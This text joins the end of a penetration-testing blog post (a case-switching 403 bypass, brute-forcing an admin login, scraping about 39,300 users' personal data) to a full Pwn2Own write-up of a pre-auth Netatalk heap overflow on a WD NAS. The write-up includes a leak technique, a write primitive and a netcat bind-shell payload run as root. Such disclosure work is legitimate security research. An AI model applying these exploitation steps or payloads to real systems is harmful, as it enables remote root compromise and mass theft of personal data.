Long story short, none of those methods worked. So, I remember that sometimes the security controls are built around the literal spelling and case of components within a request. Therefore, I tried the ‘Case Switching’ technique — probably sounds dumb, but it actually worked!

To sum it up:

  • https://redacted.com/admin -> 403 Forbidden
  • https://redacted.com/Admin -> 200 OK
  • https://redacted.com/aDmin -> 200 OK

Swiching any of the letters to a capital one, will bypass the restriction.

Voila! We get a login page to the admin panel.

admin panel — bypassed 403

We get lucky with this one, nevertheless, we are now able to try different attacks (password spraying, brute forcing etc.). The company that we are testing isn’t small and we had collected quite a large number of employee credentials from leaked databases (leak check, leak peek and others). However, this is the admin panel and therefore we go with the usual tests:

  • See if there is username enumeration
  • See if there are any login restrictions
  • Check for possible WAF that will block us due to number of requests

To keep it short, there is neither. We are unable to enumerate usernames, however there is no rate limiting of any sort.

Considering the above, we load rockyou.txt and start brute forcing the password of the ‘admin’ account. After a few thousand attempts, we see the below:

admin panel brute forcing w/ Burp Suite

We found valid credentials for the admin account. Navigate to the website’s admin panel, authenticate and we are in!

Admin panel — successful authentication

Now that we are in, there isn’t much more that we need to do or can do (without the consent of the customer). The admin panel with administrative privileges allows you to change the whole configuration — control the users & their attributes, control the website’s pages, control everything really. So, I decided to write a Python script that scrapes the whole database of users (around 39,300 — thirty nine thousand and three hundred) that contains their names, emails, phones & addresses. The idea to collect all those details is to then present them to the client (victim) — to show the seriousness of the exploited vulnerabilities. Also, due to the severity of those security weaknesses, we wrote a report the same day for those specific issues, which were fixed within 24 hours.

Ultimately, there wasn’t anything too difficult in the whole exploitation process, however the unusual 403 bypass is really something that I see for the first time and I thought that some of you might weaponize this or add it to your future 403 bypass checklists.

If you enjoyed the read, please consider supporting me: https://medium.com/@mares.viktor/membership

EXPLOITING A REMOTE HEAP OVERFLOW WITH A CUSTOM TCP STACK

EXPLOITING A REMOTE HEAP OVERFLOW WITH A CUSTOM TCP STACK

Original text by Etienne Helluy-Lafont , Luca Moro  Exploit — Download

Vulnerability details and analysis

ENVIRONMENT

The Western Digital MyCloudHome is a consumer grade NAS with local network and cloud based functionalities. At the time of the contest (firmware 7.15.1-101) the device ran a custom Android distribution on a armv8l CPU. It exposed a few custom services and integrated some open source ones such as the Netatalk daemon. This service was a prime target to compromise the device because it was running with root privileges and it was reachable from adjacent network. We will not discuss the initial surface discovery here to focus more on the vulnerability. Instead we provide a detailed analysis of the vulnerabilty and how we exploited it.

Netatalk [2] is a free and Open Source [3] implementation of the Apple Filing Protocol (AFP) file server. This protocol is used in networked macOS environments to share files between devices. Netatalk is distributed via the service afpd, also available on many Linux distributions and devices. So the work presented in this article should also apply to other systems.
Western Digital modified the sources a bit to accommodate the Android environment [4], but their changes are not relevant for this article so we will refer to the official sources.

AFP data is carried over the Data Stream Interface (DSI) protocol [5]. The exploited vulnerability lies in the DSI layer, which is reachable without any form of authentication.

OVERVIEW OF SERVER IMPLEMENTATION

The DSI layer

The server is implemented as an usual fork server with a parent process listening on the TCP port 548 and forking into new children to handle client sessions. The protocol exchanges different packets encapsulated by Data Stream Interface (DSI) headers of 16 bytes.

#define DSI_BLOCKSIZ 16
struct dsi_block {
    uint8_t dsi_flags;       /* packet type: request or reply */
    uint8_t dsi_command;     /* command */
    uint16_t dsi_requestID;  /* request ID */
    union {
        uint32_t dsi_code;   /* error code */
        uint32_t dsi_doff;   /* data offset */
    } dsi_data;
    uint32_t dsi_len;        /* total data length */
    uint32_t dsi_reserved;   /* reserved field */
};

A request is usually followed by a payload which length is specified by the 

dsi_len
 field.

The meaning of the payload depends on what 

dsi_command
 is used. A session should start with the 
dsi_command
 byte set as 
DSIOpenSession (4)
. This is usually followed up by various 
DSICommand (2)
 to access more functionalities of the file share. In that case the first byte of the payload is an AFP command number specifying the requested operation.

dsi_requestID
 is an id that should be unique for each request, giving the chance for the server to detect duplicated commands.
As we will see later, Netatalk implements a replay cache based on this id to avoid executing a command twice.

It is also worth mentioning that the AFP protocol supports different schemes of authentication as well as anonymous connections.
But this is out of the scope of this write-up as the vulnerability is located in the DSI layer, before AFP authentication.

Few notes about the server implementation

The DSI struct

To manage a client in a child process, the daemon uses a 

DSI *dsi
 struct. This represents the current connection, with its buffers and it is passed into most of the Netatalk functions. Here is the struct definition with some members edited out for the sake of clarity:

#define DSI_DATASIZ       65536

/* child and parent processes might interpret a couple of these
 * differently. */
typedef struct DSI {
    /* ... */
    struct dsi_block        header;
    /* ... */
    uint8_t  *commands;            /* DSI receive buffer */
    uint8_t  data[DSI_DATASIZ];    /* DSI reply buffer */
    size_t   datalen, cmdlen;
    off_t    read_count, write_count;
    uint32_t flags;             /* DSI flags like DSI_SLEEPING, DSI_DISCONNECTED */
    int      socket;            /* AFP session socket */
    int      serversock;        /* listening socket */

    /* DSI readahead buffer used for buffered reads in dsi_peek */
    size_t   dsireadbuf;        /* size of the DSI read ahead buffer used in dsi_peek() */
    char     *buffer;           /* buffer start */
    char     *start;            /* current buffer head */
    char     *eof;              /* end of currently used buffer */
    char     *end;

    /* ... */
} DSI;

We mainly see that the struct has:

  • The 
    command
     heap buffer used for receiving the user input, initialized in 
    dsi_init_buffer()
     with a default size of 1MB ;
  • cmdlen
     to specify the size of the input in 
    command
     ;
  • An inlined 
    data
     buffer of 64KB used for the reply ;
  • datalen
     to specify the size of the output in 
    data
     ;
  • A read ahead heap buffer managed by the pointers 
    buffer
    start
    eof
    end
    , with a default size of 12MB also initialized in 
    dsi_init_buffer()
    .

 

The main loop flow

After receiving 

DSIOpenSession
 command, the child process enters the main loop in 
afp_over_dsi()
. This function dispatches incoming commands until the end of the communication. Its simplified code is the following:

void afp_over_dsi(AFPObj *obj)
{
    DSI *dsi = (DSI *) obj->dsi;
    /* ... */
    /* get stuck here until the end */
    while (1) {
        /* ... */
        /* Blocking read on the network socket */
        cmd = dsi_stream_receive(dsi);
        /* ... */

        switch(cmd) {
        case DSIFUNC_CLOSE:
            /* ... */
        case DSIFUNC_TICKLE:
            /* ...*/
        case DSIFUNC_CMD:
            /* ... */
            function = (u_char) dsi->commands[0];
            /* ... */
            err = (*afp_switch[function])(obj, dsi->commands, dsi->cmdlen, &dsi->data, &dsi->datalen);
            /* ... */
        default:
            LOG(log_info, logtype_afpd,"afp_dsi: spurious command %d", cmd);
            dsi_writeinit(dsi, dsi->data, DSI_DATASIZ);
            dsi_writeflush(dsi);
            break;
        }

The receiving process

In the previous snippet, we saw that an idling server will receive the client data in 

dsi_stream_receive()
. Because of the buffering attempts this function is a bit cumbersome. Here is an overview of the whole receiving process within 
dsi_stream_receive()
.

dsi_stream_receive(DSI* dsi)
 
  1. define char block[DSI_BLOCKSIZ] in its stack to receive a DSI header
 
  2. dsi_buffered_stream_read(dsi, block, sizeof(block)) wait for a DSI header
    
    1. from_buf(dsi, block, length)
       Tries to fetch available data from already buffered input
       in-between dsi->start and dsi->end
    
    2. recv(dsi->socket, dsi->eof, buflen, 0)
       Tries to receive at most 8192 bytes in a buffering attempt into the look ahead buffer
       The socket is non blocking so the call usually fails
    
    3. dsi_stream_read(dsi, block, len))
      
      1. buf_read(dsi, block, len)
        
        1. from_buf(dsi, block, len)
           Tries again to get data from the buffered input
        
        2. readt(dsi->socket, block, len, 0, 0);
           Receive data on the socket
           This call will wait on a recv()/select() loop and is usually the blocking one

  3. Populate &dsi->header from what has been received

  4. dsi_stream_read(dsi, dsi->commands, dsi->cmdlen)
        
    1. calls buf_read() to fetch the DSI payload
       If not enough data is available, the call wait on select()

The main point to notice here is that the server is only buffering the client data in the 

recv()
 of 
dsi_buffered_stream_read()
 when multiple or large commands are sent as one. Also, never more than 8KB are buffered.

THE VULNERABILITY

As seen in the previous snippets, in the main loop, 

afp_over_dsi()
 can receive an unknown command id. In that case the server will call 
dsi_writeinit(dsi, dsi-&gt;data, DSI_DATASIZ)
 then 
dsi_writeflush(dsi)
.

We assume that the purpose of those two functions is to flush both the input and the output buffer, eventually purging the look ahead buffer. However these functions are really peculiar and calling them here doesn’t seem correct. Worst, 

dsi_writeinit()
has a buffer overflow vulnerability! Indeed the function will flush out bytes from the look ahead buffer into its second argument 
dsi->data
 without checking the size provided into the third argument 
DSI_DATASIZ
.

size_t dsi_writeinit(DSI *dsi, void *buf, const size_t buflen _U_)
{
    size_t bytes = 0;
    dsi->datasize = ntohl(dsi->header.dsi_len) - dsi->header.dsi_data.dsi_doff;

    if (dsi->eof > dsi->start) {
        /* We have data in the buffer */
        bytes = MIN(dsi->eof - dsi->start, dsi->datasize);
        memmove(buf, dsi->start, bytes);    // potential overflow here
        dsi->start += bytes;
        dsi->datasize -= bytes;
        if (dsi->start >= dsi->eof)
            dsi->start = dsi->eof = dsi->buffer;
    }

    LOG(log_maxdebug, logtype_dsi, "dsi_writeinit: remaining DSI datasize: %jd", (intmax_t)dsi->datasize);

    return bytes;
}

In the above code snippet, both variables 

dsi-&gt;header.dsi_len
 and 
dsi-&gt;header.dsi_data.dsi_doff
 were set up in 
dsi_stream_receive()
 and are controlled by the client. So 
dsi-&gt;datasize
 is client controlled and depending on 
MIN(dsi-&gt;eof - dsi-&gt;start, dsi-&gt;datasize)
, the following memmove could in theory overflow 
buf
 (here 
dsi-&gt;data
). This may lead to a corruption of the tail of the 
dsi
 struct as 
dsi-&gt;data
 is an inlined buffer.

However there is an important limitation: 

dsi-&gt;data
 has a size of 64KB and we have seen that the implementation of the look ahead buffer will at most read 8KB of data in 
dsi_buffered_stream_read()
. So in most cases 
dsi-&gt;eof - dsi-&gt;start
 is less than 8KB and that is not enough to overflow 
dsi-&gt;data
.

Fortunately, there is still a complex way to buffer more than 8KB of data and to trigger this overflow. The next parts explain how to reach that point and exploit this vulnerability to achieve code execution.

Exploitation

TRIGGERING THE VULNERABILITY

Finding a way to push data in the look ahead buffer

 

The curious case of dsi_peek()

While the receiving process is not straightforward, the sending one is even more confusing. There are a lot of different functions involved to send back data to the client and an interesting one is 

dsi_peek(DSI *dsi)
.

Here is the function documentation:

/*
 * afpd is sleeping too much while trying to send something.
 * May be there's no reader or the reader is also sleeping in write,
 * look if there's some data for us to read, hopefully it will wake up
 * the reader so we can write again.
 *
 * @returns 0 when is possible to send again, -1 on error
 */
 static int dsi_peek(DSI *dsi)

In other words, 

dsi_peek()
 will take a pause during a blocked send and might try to read something if possible. This is done in an attempt to avoid potential deadlocks between the client and the server. The good thing is that the reception is buffered:

static int dsi_peek(DSI *dsi)
{
    /* ... */

    while (1) {
        /* ... */
        FD_ZERO(&readfds);
        FD_ZERO(&writefds);

        if (dsi->eof < dsi->end) {
            /* space in read buffer */
            FD_SET( dsi->socket, &readfds);
        } else { /* ... */ }

        FD_SET( dsi->socket, &writefds);

        /* No timeout: if there's nothing to read nor nothing to write,
         * we've got nothing to do at all */
        if ((ret = select( maxfd, &readfds, &writefds, NULL, NULL)) <= 0) {
            if (ret == -1 && errno == EINTR)
                /* we might have been interrupted by out timer, so restart select */
                continue;
            /* give up */
            LOG(log_error, logtype_dsi, "dsi_peek: unexpected select return: %d %s",
                ret, ret < 0 ? strerror(errno) : "");
            return -1;
        }

        if (FD_ISSET(dsi->socket, &writefds)) {
            /* we can write again */
            LOG(log_debug, logtype_dsi, "dsi_peek: can write again");
            break;
        }

        /* Check if there's sth to read, hopefully reading that will unblock the client */
        if (FD_ISSET(dsi->socket, &readfds)) {
            len = dsi->end - dsi->eof; /* it's ensured above that there's space */

            if ((len = recv(dsi->socket, dsi->eof, len, 0)) <= 0) {
                if (len == 0) {
                    LOG(log_error, logtype_dsi, "dsi_peek: EOF");
                    return -1;
                }
                LOG(log_error, logtype_dsi, "dsi_peek: read: %s", strerror(errno));
                if (errno == EAGAIN)
                    continue;
                return -1;
            }
            LOG(log_debug, logtype_dsi, "dsi_peek: read %d bytes", len);

            dsi->eof += len;
        }
    }

Here we see that if the 

select()
 returns with 
dsi-&gt;socket
 set as readable and not writable, 
recv()
 is called with 
dsi-&gt;eof
. This looks like a way to push more than 64KB of data into the look ahead buffer to later trigger the vulnerability.

One question remains: how to reach dsi_peek()?

 

Reaching dsi_peek()

While there are multiple ways to get into that function, we focused on the 

dsi_cmdreply()
 call path. This function is used to reply to a client request, which is done with most AFP commands. For instance sending a request with 
DSIFUNC_CMD
 and the AFP command 
0x14
 will trigger a logout attempt, even for an un-authenticated client and reach the following call stack:

afp_over_dsi()
dsi_cmdreply(dsi, err)
dsi_stream_send(dsi, dsi->data, dsi->datalen);
dsi_stream_write(dsi, block, sizeof(block), 0)

From there the following code is executed:

ssize_t dsi_stream_write(DSI *dsi, void *data, const size_t length, int mode)
{

  /* ... */
  while (written < length) {
      len = send(dsi->socket, (uint8_t *) data + written, length - written, flags);
      if (len >= 0) {
          written += len;
          continue;
      }

      if (errno == EINTR)
          continue;

      if (errno == EAGAIN || errno == EWOULDBLOCK) {
          LOG(log_debug, logtype_dsi, "dsi_stream_write: send: %s", strerror(errno));

          if (mode == DSI_NOWAIT && written == 0) {
              /* DSI_NOWAIT is used by attention give up in this case. */
              written = -1;
              goto exit;
          }

          /* Try to read sth. in order to break up possible deadlock */
          if (dsi_peek(dsi) != 0) {
              written = -1;
              goto exit;
          }
          /* Now try writing again */
          continue;
      }

      /* ... */

In the above code, we see that in order to reach 

dsi_peek()
 the call to 
send()
 has to fail.

 

Summarizing the objectives and the strategy

So to summarize, in order to push data into the look ahead buffer one can:

  1. Send a logout command to reach 
    dsi_cmdreply
    .
  2. In 
    dsi_stream_write
    , find a way to make the 
    send()
     syscall fail.
  3. In 
    dsi_peek()
     find a way to make 
    select()
     only returns a readable socket.

Getting a remote system to fail at sending data, while maintaining the stream open is tricky. One funny way to do that is to mess up with the TCP networking layer. The overall strategy is to have a custom TCP stack that will simulate a network congestion once a logout request is sent, but only in one direction. The idea is that the remote application will think that it can not send any more data, while it can still receive some.

Because there are a lot of layers involved (the networking card layer, the kernel buffering, the remote TCP congestion avoidance algorithm, the userland stack (?)) it is non trivial to find the optimal way to achieve the goals. But the chosen approach is a mix between two techniques:

  • Zero’ing the TCP windows of the client side, letting the remote one think our buffer is full ;
  • Stopping sending ACK packets for the server replies.

This strategy seems effective enough and the exploit manages to enter the wanted codepath within a few seconds.

Writing a custom TCP stack

To achieve the described strategy we needed to re-implement a TCP networking stack. Because we did not want to get into low-levels details, we decided to use scapy [6] and implemented it in Python over raw sockets.

The class 

RawTCP
 of the exploit is the result of this development. It is basic and slow and it does not handle most of the specific aspects of TCP (such as packets re-ordering and re-transmission). However, because we expect the targeted device to be in the same network without networking reliability issues, the current implementation is stable enough.

The most noteworthy details of 

RawTCP
 is the attribute 
reply_with_ack
 that could be set to 0 to stop sending ACK and 
window
 that is used to advertise the current buffer size.

One prerequisite of our exploit is that the attacker kernel must be «muzzled down» so that it doesn’t try to interpret incoming and unexpected TCP segments.
Indeed the Linux TCP stack is not aware of our shenanigans on the TCP connection and he will try to kill it by sending RST packets.

One can prevent Linux from sending RST packets to the target, with an iptables rule like this:

# iptables -I OUTPUT -p tcp -d TARGET_IP --dport 548 --tcp-flags RST RST -j DROP

Triggering the bug

To sum up, here is how we managed to trigger the bug. The code implementing this is located in the function 

do_overflow
 of the exploit:

  1. Open a session by sending DSIOpenSession.
  2. In a bulk, send a lot of DSICommand requests with the logout function 0x14 to force the server to get into dsi_cmdreply().
    From our tests 3000 commands seems enough for the targeted hardware.
  3. Simulate a congestion by advertising a TCP windows size of 0 while stopping to ACK reply the server replies.
    After a short while the server should be stuck in dsi_peek() being only capable of receiving data.
  4. Send a DSI dummy and invalid command with a dsi_len and payload larger than 64KB.
    This command is received in dsi_peek() and later consumed in dsi_stream_receive() / dsi_stream_read() / buf_read().
    In the exploit we use the command id DSIFUNC_MAX+1 to enter the default case of the afp_over_dsi() switch.
  5. Send a block of raw data larger than 64KB.
    This block is also received in dsi_peek() while the server is blocked but is consumed in dsi_writeinit() by overflowing dsi->data and the tail of the dsi struct.
  6. Start to acknowledge again the server replies (3000) by sending ACK back and a proper TCP window size.
    This triggers the handling of the logout commands that were not handled before the obstruction, then the invalid command to reach the overflow.

The whole process is done pretty quickly in a few seconds, depending on the setup (usually less than 15s).

GETTING A LEAK

To exploit the server, we need to know where the main binary (apfd) is loaded in memory. The server runs with Address Space Layout Randomization (ASLR) enabled, therefore the base address of apfd changes each time the server gets started. Fortunately for us, apfd forks before handling a client connection, so the base address will remain the same across all connections even if we crash a forked process.

In order to defeat ASLR, we need to leak a pointer to some known memory location in the apfd binary. To obtain this leak, we can use the overflow to corrupt the tail of the 

dsi
 struct (after the data buffer) to force the server to send us more data than expected. The command replay cache feature of the server provides a convenient way to do so.

Here are the relevant part of the main loop of 

afp_over_dsi()
:

/ in afp_over_dsi()
    case DSIFUNC_CMD:

        function = (u_char) dsi->commands[0];

        /* AFP replay cache */
        rc_idx = dsi->clientID % REPLAYCACHE_SIZE;
        LOG(log_debug, logtype_dsi, "DSI request ID: %u", dsi->clientID);

        if (replaycache[rc_idx].DSIreqID == dsi->clientID
            && replaycache[rc_idx].AFPcommand == function) {

            LOG(log_note, logtype_afpd, "AFP Replay Cache match: id: %u / cmd: %s",
                dsi->clientID, AfpNum2name(function));
            err = replaycache[rc_idx].result;

            /* AFP replay cache end */

        } else {
                dsi->datalen = DSI_DATASIZ;
                dsi->flags |= DSI_RUNNING;
            /* ... */

            if (afp_switch[function]) {
                /* ... */
                err = (*afp_switch[function])(obj,
                                              (char *)dsi->commands, dsi->cmdlen,
                                              (char *)&dsi->data, &dsi->datalen);

                /* ... */
                /* Add result to the AFP replay cache */
                replaycache[rc_idx].DSIreqID = dsi->clientID;
                replaycache[rc_idx].AFPcommand = function;
                replaycache[rc_idx].result = err;
            }
        }
        /* ... */
        dsi_cmdreply(dsi, err)

        /* ... */

Here is the code for 

dsi_cmdreply()
:

int dsi_cmdreply(DSI *dsi, const int err)
{
    int ret;

    LOG(log_debug, logtype_dsi, "dsi_cmdreply(DSI ID: %u, len: %zd): START",
        dsi->clientID, dsi->datalen);

    dsi->header.dsi_flags = DSIFL_REPLY;
    dsi->header.dsi_len = htonl(dsi->datalen);
    dsi->header.dsi_data.dsi_code = htonl(err);

    ret = dsi_stream_send(dsi, dsi->data, dsi->datalen);

    LOG(log_debug, logtype_dsi, "dsi_cmdreply(DSI ID: %u, len: %zd): END",
        dsi->clientID, dsi->datalen);

    return ret;
}

When the server receives the same command twice (same 

clientID
 and 
function
), it takes the replay cache code path which calls 
dsi_cmdreply()
 without initializing 
dsi-&gt;datalen
. So in that case, 
dsi_cmdreply()
 will send  
dsi-&gt;datalen
 bytes of 
dsi-&gt;data
 back to the client in 
dsi_stream_send()
.

This is fortunate because the 

datalen
 field is located just after the data buffer in the struct DSI. That means that to control 
datalen
 we just need to trigger the overflow with 65536 + 4 bytes (4 being the size of a size_t).

Then, by sending a 

DSICommand
 command with an already used 
clientID
 we reach a 
dsi_cmdreply()
 that can send back all the 
dsi-&gt;data
 buffer, the tail of the 
dsi
 struct and part of the following heap data. In the 
dsi
 struct tail, we get some heap pointers such as 
dsi-&gt;buffer
dsi-&gt;start
dsi-&gt;eof
dsi-&gt;end
. This is useful because we now know where client controlled data is stored.
In the following heap data, we hopefully expect to find pointers into afpd main image.

From our experiments we found out that most of the time, by requesting a leak of 2MB+64KB we get parts of the heap where 

hash_t
 objects were allocated by 
hash_create()
:

typedef struct hash_t {
    #if defined(HASH_IMPLEMENTATION) || !defined(KAZLIB_OPAQUE_DEBUG)
    struct hnode_t **hash_table;        /* 1 */
    hashcount_t hash_nchains;           /* 2 */
    hashcount_t hash_nodecount;         /* 3 */
    hashcount_t hash_maxcount;          /* 4 */
    hashcount_t hash_highmark;          /* 5 */
    hashcount_t hash_lowmark;           /* 6 */
    hash_comp_t hash_compare;           /* 7 */
    hash_fun_t hash_function;           /* 8 */
    hnode_alloc_t hash_allocnode;
    hnode_free_t hash_freenode;
    void *hash_context;
    hash_val_t hash_mask;           /* 9 */
    int hash_dynamic;               /* 10 */
    #else
    int hash_dummy;
    #endif
} hash_t;

hash_t *hash_create(hashcount_t maxcount, hash_comp_t compfun,
                    hash_fun_t hashfun)
{
    hash_t *hash;

    if (hash_val_t_bit == 0)    /* 1 */
        compute_bits();

    hash = malloc(sizeof *hash);    /* 2 */

    if (hash) {     /* 3 */
        hash->table = malloc(sizeof *hash->table * INIT_SIZE);  /* 4 */
        if (hash->table) {  /* 5 */
            hash->nchains = INIT_SIZE;      /* 6 */
            hash->highmark = INIT_SIZE * 2;
            hash->lowmark = INIT_SIZE / 2;
            hash->nodecount = 0;
            hash->maxcount = maxcount;
            hash->compare = compfun ? compfun : hash_comp_default;
            hash->function = hashfun ? hashfun : hash_fun_default;
            hash->allocnode = hnode_alloc;
            hash->freenode = hnode_free;
            hash->context = NULL;
            hash->mask = INIT_MASK;
            hash->dynamic = 1;          /* 7 */
            clear_table(hash);          /* 8 */
            assert (hash_verify(hash));
            return hash;
        }
        free(hash);
    }
    return NULL;
}

The 

hash_t
 structure is very distinct from other data and contains pointers on the 
hnode_alloc()
 and 
hnode_free()
functions that are located in the afpd main image.
Therefore by parsing the received leak, we can look for 
hash_t
 patterns and recover the ASLR slide of the main binary. This method is implemented in the exploit in the function 
parse_leak()
.

Regrettably this strategy is not 100% reliable depending on the heap initialization of afpd.
There might be non-mapped memory ranges after the 

dsi
 struct, crashing the daemon while trying to send the leak.
In that case, the exploit won’t work until the device (or daemon) get restarted.
Fortunately, this situation seems rare (less than 20% of the cases) giving the exploit a fair chance of success.

BUILDING A WRITE PRIMITIVE

Now that we know where the main image and heap are located into the server memory, it is possible to use the full potential of the vulnerability and overflow the rest of the 

struct *DSI
 to reach code execution.

Rewriting 

dsi-&gt;proto_close
 looks like a promising way to get the control of the flow. However because of the lack of control on the arguments, we’ve chosen another exploitation method that works equally well on all architectures but requires the ability to write arbitrary data at a chosen location.


The look ahead pointers of the 

DSI
 structure seem like a nice opportunity to achieve a controlled write.

typedef struct DSI {
    /* ... */
    uint8_t  data[DSI_DATASIZ];
    size_t   datalen, cmdlen; /* begining of the overflow */
    off_t    read_count, write_count;
    uint32_t flags;             /* DSI flags like DSI_SLEEPING, DSI_DISCONNECTED */
    int      socket;            /* AFP session socket */
    int      serversock;        /* listening socket */

    /* DSI readahead buffer used for buffered reads in dsi_peek */
    size_t   dsireadbuf;        /* size of the DSI readahead buffer used in dsi_peek() */
    char     *buffer;           /* buffer start */
    char     *start;            /* current buffer head */
    char     *eof;              /* end of currently used buffer */
    char     *end;

    /* ... */
} DSI;

By setting 

dsi-&gt;buffer
 to the location we want to write and 
dsi-&gt;end
 as the upper bound of the writing location, the next command buffered by the server can end-up at a controlled address.

One should takes care while setting 

dsi->start
 and 
dsi->eof
, because they are reset to 
dsi->buffer
 after the overflow in 
dsi_writeinit()
:

    if (dsi->eof > dsi->start) {
        /* We have data in the buffer */
        bytes = MIN(dsi->eof - dsi->start, dsi->datasize);
        memmove(buf, dsi->start, bytes);
        dsi->start += bytes;         // the overflowed value is changed back here ...
        dsi->datasize -= bytes;
        if (dsi->start >= dsi->eof)
            dsi->start = dsi->eof = dsi->buffer; // ... and there
    }

As seen in the snippet, this is only a matter of setting 

dsi-&gt;start
 greater than 
dsi-&gt;eof
 during the overflow.

So to get a write primitive one should:

  1. Overflow 
    dsi-&gt;buffer
    dsi-&gt;end
    dsi-&gt;start
     and 
    dsi-&gt;eof
     according to the write location.
  2. Send two commands in the same TCP segment.

The first command is just a dummy one, and the second command contains the data to write.

Sending two commands here seems odd but it it necessary to trigger the arbitrary write, because of the convoluted reception mechanism of 

dsi_stream_read()
.

When receiving the first command, 

dsi_buffered_stream_read()
 will skip the non-blocking call to 
recv()
 and take the blocking receive path in 
dsi_stream_read()
 -> 
buf_read()
 -> 
readt()
.

The controlled write happens during the reception of the second command. Because the two commands were sent in the same TCP segment, the data of the second one is most likely to be available on the socket. Therefore the non-blocking 

recv()
 should succeed and write at 
dsi-&gt;eof
.

COMMAND EXECUTION

With the ability to write arbitrary data at a chosen location it is now possible to take control of the remote program.

The most obvious location to write to is the array 

preauth_switch
:

static AFPCmd preauth_switch[] = {
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,                 /*   0 -   7 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,                 /*   8 -  15 */
    NULL, NULL, afp_login, afp_logincont,
    afp_logout, NULL, NULL, NULL,               /*  16 -  23 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,                 /*  24 -  31 */
    NULL, NULL, NULL, NULL,
    NULL, NULL, NULL, NULL,                 /*  32 -  39 */
    NULL, NULL, NULL, NULL,
    ...

As seen previously, this array is used in 

afp_over_dsi()
 to dispatch the client 
DSICommand
 requests. By writing an arbitrary entry in the table, it is then possible to perform the following call with a controlled function pointer:

err = (*afp_switch[function])(obj,
                (char *)dsi->commands, dsi->cmdlen,
                (char *)&dsi->data, &dsi->datalen);

One excellent candidate to replace 

preauth_switch[function]
 with is 
afprun()
. This function is used by the server to launch a shell command, and can even do so with root privileges 🙂

int afprun(int root, char *cmd, int *outfd)
{
    pid_t pid;
    uid_t uid = geteuid();
    gid_t gid = getegid();

    /* point our stdout at the file we want output to go into */
    if (outfd && ((*outfd = setup_out_fd()) == -1)) {
        return -1;
    }

    /* ... */

    if ((pid=fork()) < 0) { /* ... */ }

    /* ... */

    /* now completely lose our privileges. This is a fairly paranoid
       way of doing it, but it does work on all systems that I know of */
    if (root) {
        become_user_permanently(0, 0);
        uid = gid = 0;
    }
    else {
        become_user_permanently(uid, gid);
    }

    /* ... */

    execl("/bin/sh","sh","-c",cmd,NULL);
    /* not reached */
    exit(82);
    return 1;
}

So to get a command executed as root, we transform the call:

(*afp_switch[function])(obj, dsi->commands, dsi->cmdlen, [...]);

into

afprun(int root, char *cmd, int *outfd)

The situation is the following:

  •  
    function
     is chosen by the client so that 
    afp_switch[function]
     is the function pointer overwritten with 
    afprun
     ;
  •  
    obj
     is a non-NULL 
    AFPObj*
     pointer, which fits with the 
    root
     argument that should be non zero ;
  •  
    dsi-&gt;commands
     is a valid pointer with controllable content, where we can put a chosen command such as a binded netcat shell ;
  •  
    dsi-&gt;cmdlen
     must either be NULL or a valid pointer because 
    *outfd
     is dereferenced in 
    afprun
    .

Here is one final difficulty. It is not possible to send a 

dsi-&gt;command
 long enough so that 
dsi-&gt;cmdlen
 becomes a valid pointer.
But with a NULL 
dsi-&gt;cmdlen
dsi-&gt;command
 is not controlled anymore.

The trick is to observe that 

dsi_stream_receive()
 does not clean the 
dsi-&gt;command
 in between client requests, and 
afp_over_dsi()
 does not check 
cmdlen
 before using 
dsi-&gt;commands[0]
.

So if a client send a DSI a packet without a 

dsi-&gt;command
 payload and a 
dsi-&gt;cmdlen
 of zero, the 
dsi-&gt;command
 remains the same as the previous command.

As a result it is possible to send:

  • A first DSI request with 
    dsi-&gt;command
     being something similar to 
    &lt;function_id&gt; ; /sbin/busybox nc -lp &lt;PORT&gt; -e /bin/sh;
    .
  • A second DSI request with a zero 
    dsi-&gt;cmdlen
    .

This ends up calling:

(*afp_switch[function_id])(obj,"<function_id> ; /sbin/busybox nc -lp <PORT> -e /bin/sh;", 0, [...])

which is what was required to get RCE once 

afp_switch[function_id]
 was overwritten with 
afprun
.


As a final optimization, it is even possible to send the last two DSI packets triggering code execution as the last two commands required for the write primitive.
This results in doing the 

preauth_switch
 overwrite and the 
dsi-&gt;command
dsi-&gt;cmdlen
 setup at the same time.
As a matter of fact, this is even easier to mix both because of a detail that is not worth explaining into that write-up.
The interested reader can refer to the exploit commentaries.

PUTTING THINGS TOGETHER

To sum up here is an overview of the exploitation process:

  1. Setting up the connection.
  2. Triggering the vulnerability with a 4 bytes overflow to rewrite 
    dsi-&gt;datalen.
  3. Sending a command with a previously used 
    clientID
     to trigger the leak.
  4. Parsing the leak while looking for 
    hash_t
     struct, giving pointers to the afpd main image.
  5. Closing the old connection and setting up a new connection.
  6. Triggering the vulnerability with a larger overflow to rewrite the look ahead buffer pointers of the 
    dsi
     struct.
  7. Sending both requests as one:
    1. A first 
      DSICommand
       with the content 
      "&lt;function_id&gt; ; /sbin/busybox nc -lp &lt;PORT&gt; -e /bin/sh;"
       ;
    2. A second 
      DSICommand
       with the content 
      &amp;afprun
       but with a zero length 
      dsi_len
       and 
      dsi-&gt;cmdlen.
  8. Sending a 
    DSICommand
     without content to trigger the command execution.

CONCLUSION

During this research we developed a working exploit for the latest version of Netatalk. It uses a single heap overflow vulnerability to bypass all mitigations and obtain command execution as root. On the MyCloud Home the afpd services was configured to allow guest authentication, but since the bug was accessible prior to authentication the exploit works even if guest authentication is disabled.

The funkiest part was undoubtedly implementing a custom TCP stack to trigger the bug. This is quite uncommon for an user land and real life (as not in a CTF) exploit, and we hope that was entertaining for the reader.

Our exploit will be published on GitHub after a short delay. It should work as it on the targeted device. Adapting it to other distributions should require some minor tweaks and is left as an exercise.

Unfortunately, our Pwn2Own entry ended up being a duplicate with the Mofoffensive team who targeted another device that shipped an older version of Netatalk. In this previous release the vulnerability was in essence already there, but maybe a little less fun to exploit as it did not required to mess with the network stack.

We would like to thank:

  • ZDI and Western Digital for their organization of the P2O competition, especially this session considering the number of teams and their help to setup an environment for our exploit ;
  • The Netatalk team for the considerable amount of work and effort they put into this Open Source project.

TIMELINE

  • 2022-06-03 — Vulnerability reported to vendor
  • 2023-02-06 — Coordinated public release of advisory